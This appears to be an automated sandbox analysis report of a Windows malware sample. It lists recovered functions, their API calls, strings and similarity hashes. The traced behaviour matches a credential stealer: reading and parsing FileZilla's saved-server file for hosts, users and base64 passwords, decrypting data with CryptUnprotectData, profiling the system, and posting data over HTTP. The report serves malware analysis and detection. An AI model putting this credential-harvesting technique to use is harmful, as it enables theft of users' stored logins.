memcpy.MSVCRT ref: 00409C16
LocalFree.KERNEL32(?), ref: 00409C23

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction ID: 89a0ba0d6d0461e137ce63e6e87bc55d2f461512d11096c1476870e855060961
Opcode Fuzzy Hash: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction Fuzzy Hash: 7111E8B8A00209DFCB04DF94D984AAEB7B6FF88300F108569E915A7390D730AE51CF65

Function 004174D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D
wsprintfA.USER32 ref: 00417557

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction ID: e353cc71a305f1a8f1a8746e49c408d3a80ec80c51124973b3d8e1cf6413b4f4
Opcode Fuzzy Hash: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction Fuzzy Hash: 4111E1B1E05618EBEB20CF54DC45FA9B779FB00720F10039AF50A932D0C7785A85CB55

Function 004172F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

Function 00407750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00415CA4,?), ref: 00407764
RtlAllocateHeap.NTDLL(00000000,?,00415CA4,?), ref: 0040776B
lstrcat.KERNEL32(?,026B02E0), ref: 0040791B
lstrcat.KERNEL32(?,?), ref: 0040792F
lstrcat.KERNEL32(?,?), ref: 00407943
lstrcat.KERNEL32(?,?), ref: 00407957
lstrcat.KERNEL32(?,026D8F80), ref: 0040796B
lstrcat.KERNEL32(?,026D8F98), ref: 0040797F
lstrcat.KERNEL32(?,026D8FB0), ref: 00407992
lstrcat.KERNEL32(?,026D8FC8), ref: 004079A6
lstrcat.KERNEL32(?,026B1DD8), ref: 004079BA
lstrcat.KERNEL32(?,?), ref: 004079CE
lstrcat.KERNEL32(?,?), ref: 004079E2
lstrcat.KERNEL32(?,?), ref: 004079F6
lstrcat.KERNEL32(?,026D8F80), ref: 00407A09
lstrcat.KERNEL32(?,026D8F98), ref: 00407A1D
lstrcat.KERNEL32(?,026D8FB0), ref: 00407A31
lstrcat.KERNEL32(?,026D8FC8), ref: 00407A44
lstrcat.KERNEL32(?,026D9EB8), ref: 00407A58
lstrcat.KERNEL32(?,?), ref: 00407A6C
lstrcat.KERNEL32(?,?), ref: 00407A80
lstrcat.KERNEL32(?,?), ref: 00407A94
lstrcat.KERNEL32(?,026D8F80), ref: 00407AA8
lstrcat.KERNEL32(?,026D8F98), ref: 00407ABB
lstrcat.KERNEL32(?,026D8FB0), ref: 00407ACF
lstrcat.KERNEL32(?,026D8FC8), ref: 00407AE3
lstrcat.KERNEL32(?,026D9F20), ref: 00407AF6
lstrcat.KERNEL32(?,?), ref: 00407B0A
lstrcat.KERNEL32(?,?), ref: 00407B1E
lstrcat.KERNEL32(?,?), ref: 00407B32
lstrcat.KERNEL32(?,026D8F80), ref: 00407B46
lstrcat.KERNEL32(?,026D8F98), ref: 00407B5A
lstrcat.KERNEL32(?,026D8FB0), ref: 00407B6D
lstrcat.KERNEL32(?,026D8FC8), ref: 00407B81
lstrcat.KERNEL32(?,026D6F18), ref: 00407B95
lstrcat.KERNEL32(?,?), ref: 00407BA9
lstrcat.KERNEL32(?,?), ref: 00407BBD
lstrcat.KERNEL32(?,?), ref: 00407BD1
lstrcat.KERNEL32(?,026D8F80), ref: 00407BE4
lstrcat.KERNEL32(?,026D8F98), ref: 00407BF8
lstrcat.KERNEL32(?,026D8FB0), ref: 00407C0C
lstrcat.KERNEL32(?,026D8FC8), ref: 00407C1F
lstrcat.KERNEL32(?,026D6F80), ref: 00407C33
lstrcat.KERNEL32(?,?), ref: 00407C47
lstrcat.KERNEL32(?,?), ref: 00407C5B
lstrcat.KERNEL32(?,?), ref: 00407C6F
lstrcat.KERNEL32(?,026D8F80), ref: 00407C83
lstrcat.KERNEL32(?,026D8F98), ref: 00407C96
lstrcat.KERNEL32(?,026D8FB0), ref: 00407CAA
lstrcat.KERNEL32(?,026D8FC8), ref: 00407CBE

Part of subcall function 00407610: lstrcat.KERNEL32(35416020,004217A0), ref: 00407646
Part of subcall function 00407610: lstrcat.KERNEL32(35416020,00000000), ref: 00407688
Part of subcall function 00407610: lstrcat.KERNEL32(35416020, : ), ref: 0040769A
Part of subcall function 00407610: lstrcat.KERNEL32(35416020,00000000), ref: 004076CF
Part of subcall function 00407610: lstrcat.KERNEL32(35416020,004217A8), ref: 004076E0
Part of subcall function 00407610: lstrcat.KERNEL32(35416020,00000000), ref: 00407713
Part of subcall function 00407610: lstrcat.KERNEL32(35416020,004217AC), ref: 0040772D
Part of subcall function 00407610: task.LIBCPMTD ref: 0040773B

lstrcat.KERNEL32(?,026BBF28), ref: 00407E4B
lstrcat.KERNEL32(?,026D9A00), ref: 00407E5E
lstrlenA.KERNEL32(35416020), ref: 00407E6B
lstrlenA.KERNEL32(35416020), ref: 00407E7B

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 1a9d6fb503fb913faee09f78ac793ac6dc3067147ee9e0764d82c310f013f8e9
Instruction ID: 1e9b08135f7dcdfaa8f2c2dd520ea7fbbb4c73797e410f6fed26cf7179196423
Opcode Fuzzy Hash: 1a9d6fb503fb913faee09f78ac793ac6dc3067147ee9e0764d82c310f013f8e9
Instruction Fuzzy Hash: 8B3264B2C00615ABCB25EBA0DC89DDE773DAB48704F444A9DF60962090EE79E7C5CF64

Function 00410090 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

strtok_s.MSVCRT ref: 0041015B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DA6,00420DA3,00420DA2,00420D9F), ref: 004101A2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004101A9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004101C5
lstrlenA.KERNEL32(00000000), ref: 004101D3

Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041020F
lstrlenA.KERNEL32(00000000), ref: 0041021D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410259
lstrlenA.KERNEL32(00000000), ref: 00410267
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004102A3
lstrlenA.KERNEL32(00000000), ref: 004102B5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 00410342
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041035A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410372
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041038A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 004103A2
lstrcat.KERNEL32(?,profile: null), ref: 004103B1
lstrcat.KERNEL32(?,url: ), ref: 004103C0
lstrcat.KERNEL32(?,00000000), ref: 004103D3
lstrcat.KERNEL32(?,0042161C), ref: 004103E2
lstrcat.KERNEL32(?,00000000), ref: 004103F5
lstrcat.KERNEL32(?,00421620), ref: 00410404
lstrcat.KERNEL32(?,login: ), ref: 00410413
lstrcat.KERNEL32(?,00000000), ref: 00410426
lstrcat.KERNEL32(?,0042162C), ref: 00410435
lstrcat.KERNEL32(?,password: ), ref: 00410444
lstrcat.KERNEL32(?,00000000), ref: 00410457
lstrcat.KERNEL32(?,0042163C), ref: 00410466
lstrcat.KERNEL32(?,00421640), ref: 00410475
strtok_s.MSVCRT ref: 004104B9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004104CE
memset.MSVCRT ref: 0041051D

Strings

login: , xrefs: 0041040A
profile: null, xrefs: 004103A8
url: , xrefs: 004103B7
<Pass encoding="base64">, xrefs: 0041029A
browser: FileZilla, xrefs: 00410399
<Port>, xrefs: 00410206
password: , xrefs: 0041043B
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004100E4
<Host>, xrefs: 004101BC
<User>, xrefs: 00410250

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: c0d9142bf0e2afacecb8c58c534a7c5f399e23a42f9b2e902ca3ffc8e458fb26
Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
Opcode Fuzzy Hash: c0d9142bf0e2afacecb8c58c534a7c5f399e23a42f9b2e902ca3ffc8e458fb26
Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69

Function 00419270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,026BCB58), ref: 004192B1
GetProcAddress.KERNEL32(75900000,026BCA80), ref: 004192CA
GetProcAddress.KERNEL32(75900000,026D6D78), ref: 004192E2
GetProcAddress.KERNEL32(75900000,026D6DC0), ref: 004192FA
GetProcAddress.KERNEL32(75900000,026D6D90), ref: 00419313
GetProcAddress.KERNEL32(75900000,026B6420), ref: 0041932B
GetProcAddress.KERNEL32(75900000,026B5B88), ref: 00419343
GetProcAddress.KERNEL32(75900000,026B5A28), ref: 0041935C
GetProcAddress.KERNEL32(75900000,026D6DA8), ref: 00419374
GetProcAddress.KERNEL32(75900000,026D6DD8), ref: 0041938C
GetProcAddress.KERNEL32(75900000,026D6D48), ref: 004193A5
GetProcAddress.KERNEL32(75900000,026D6DF0), ref: 004193BD
GetProcAddress.KERNEL32(75900000,026B5BE8), ref: 004193D5
GetProcAddress.KERNEL32(75900000,026D6D30), ref: 004193EE
GetProcAddress.KERNEL32(75900000,026D6D60), ref: 00419406
GetProcAddress.KERNEL32(75900000,026B5888), ref: 0041941E
GetProcAddress.KERNEL32(75900000,026D6CA0), ref: 00419437
GetProcAddress.KERNEL32(75900000,026D6CE8), ref: 0041944F
GetProcAddress.KERNEL32(75900000,026B59C8), ref: 00419467
GetProcAddress.KERNEL32(75900000,026D6AC0), ref: 00419480
GetProcAddress.KERNEL32(75900000,026B59A8), ref: 00419498
LoadLibraryA.KERNEL32(026D6D18,?,004164A0), ref: 004194AA
LoadLibraryA.KERNEL32(026D6A60,?,004164A0), ref: 004194BB
LoadLibraryA.KERNEL32(026D6D00,?,004164A0), ref: 004194CD
LoadLibraryA.KERNEL32(026D6C58,?,004164A0), ref: 004194DF
LoadLibraryA.KERNEL32(026D6A30,?,004164A0), ref: 004194F0
GetProcAddress.KERNEL32(75070000,026D6A48), ref: 00419512
GetProcAddress.KERNEL32(75FD0000,026D6B08), ref: 00419533
GetProcAddress.KERNEL32(75FD0000,026D6C70), ref: 0041954B
GetProcAddress.KERNEL32(75A50000,026D6B68), ref: 0041956D
GetProcAddress.KERNEL32(74E50000,026B59E8), ref: 0041958E
GetProcAddress.KERNEL32(76E80000,026B6460), ref: 004195AF
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 004195C6

Strings

NtQueryInformationProcess, xrefs: 004195BA

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00418940: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000), ref: 00418960

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,026DADC0), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,026DAEF0,?,026DA3D8,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,026DAF50,00000000,?,026B8958,00000000,?,00421980,00000000,?,00414CAF), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

--, xrefs: 004052D0
", xrefs: 00405756
